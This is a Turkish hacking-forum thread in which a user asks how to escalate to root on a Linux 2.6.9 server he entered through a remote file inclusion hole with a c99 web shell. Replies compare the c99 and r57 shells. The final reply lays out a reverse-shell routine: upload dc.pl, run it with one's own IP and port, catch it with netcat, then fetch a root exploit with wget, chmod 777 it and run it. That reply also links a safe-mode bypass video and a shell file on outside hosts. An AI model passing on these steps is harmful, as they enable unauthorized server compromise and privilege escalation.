Müridler Yardım Edin ?
-
Mürid arkadaşlarım sizlere birkaç soru sorucam umarım cevap verirsiniz
cevap vermeseniz bile canınız sağolsun :)
1)Elimde bi server var linux 2.6.9 sürümünde elimde root yapabilceğim exploitte var fakat sistemde bulun rfi açığında
c99 shell kullandım buraya kadar herşey normal fakat c99 yerine mesela r57 ile uyguladığımda hiçbirşey olmuyor :S
neden kaynaklanıyor?
2)Bu serverda kullandığım shellde backconnect özelliği yoktu bende işte rootlamak için exploiti .c formatında kaydedip
normal hostuma attım (ücretli) sonra pc den 80. port üzeri bağlanmak istedim fakat bi türlü iletişimi sağlayamadım.
Aklımda şöyle birşey var exploiti .c olarak kaydedip shelle upload etsem shell üzerinden *nasıl derleyebilirim ?
Eğer derlersem root olma imkanım varmı?
3)Safe mod:on olan serverlarda safe mod:off yapılabilirmi böyle bir imkanımız varmı? Bide Bypass Shell dediği yöntem tam olarak nasıl oluyor?
Kusura kalmayın mürid arkadaşlarım sizinde başınızı ağrıttım ama benim için önemli bi aşama şuanlık ?
-
Abi bu soruları "Google amca" ya sorman gerekmez mi ?
Birilerinin cevaplaması için fazla zahmetli ve uzun değil mi ?
Şimdi biri gelip sana uzun bir
"Howto Exploit" dokumanı cp lese şaşırır mısın ?
-
yaw google amca hep dandik sitelere yönlendiriyor :S bide burada gerçekten bu işten anlayanlar var hani birine bile cevap verse herkes biter bu sorular
-
ilk sorunun cevabı çok geniş adamın disable yaptıgı fonksiyonlardan tut yazdıgı politikalara kadar degişir
ikinci sorunun cevabı önce bir shell acountuna sahip olman gerekmektedir eger bir şekilde sahip olursan yada zaten varsa bile gerekli exploiti derlicek yetkin olmayabilir olsa bile eger iyi bir SELinux politikası yazıldıysa sistem seni otomatik atar.
üçüncü ve son sorunun cevaı evet mümkün ama ugraştıran ve sisteme has ezbere birşey diyemem -
3)Safe mod:on olan serverlarda safe mod:off yapılabilirmi böyle bir imkanımız varmı? Bide Bypass Shell dediği yöntem tam olarak nasıl oluyor?
bu sorunun cevabını bende istiyorum
-
1011010 bunu yazdı:
-----------------------------3)Safe mod:on olan serverlarda safe mod:off yapılabilirmi böyle bir imkanımız varmı? Bide Bypass Shell dediği yöntem tam olarak nasıl oluyor?
bu sorunun cevabını bende istiyorum
-----------------------------
@10101:Evet yapılabilir.Konu ile ilgili yazdığım dökümanı ben paylaşmıştım.Safe mod:onu off yapma diye aratırsan bulabilirsin.
@5u13Ym4n
c99 ve r57nin işlevi farklıdır.serverlar için,onlara sızmak için r57 kullanılır,c99 daha çok bir site üzerinde kullanılır rfi,lfi gibi olaylarda.
Portunu açmadıysan bağlantı yapamazsın :) Ayrıca dediğim gibi r57 backconnect gibi özellikleriyle server işleri için daha uygundur -
1.c99 ilede backdoor kurabilirsin. dc.pl yi bul. servera upload et . command satırına perl dc.pl ipnumaran portun yaz sonra çalıstıra cmd yaz netcatın komutunu yazar olursun.
2. sorunun cevabı root exploit derlemek için ya upload ediceksin yada linux serverlarda wgetle çekip chmod 777 exploit adı ve ./exploidadi şeklinde yapıcaksın.
3.sorunda al sana safemod on server root videosu
video: www.notarize4all.com/elhacker/clip0003.rar
shell: http://elhacker.by.ru/elhacker.txt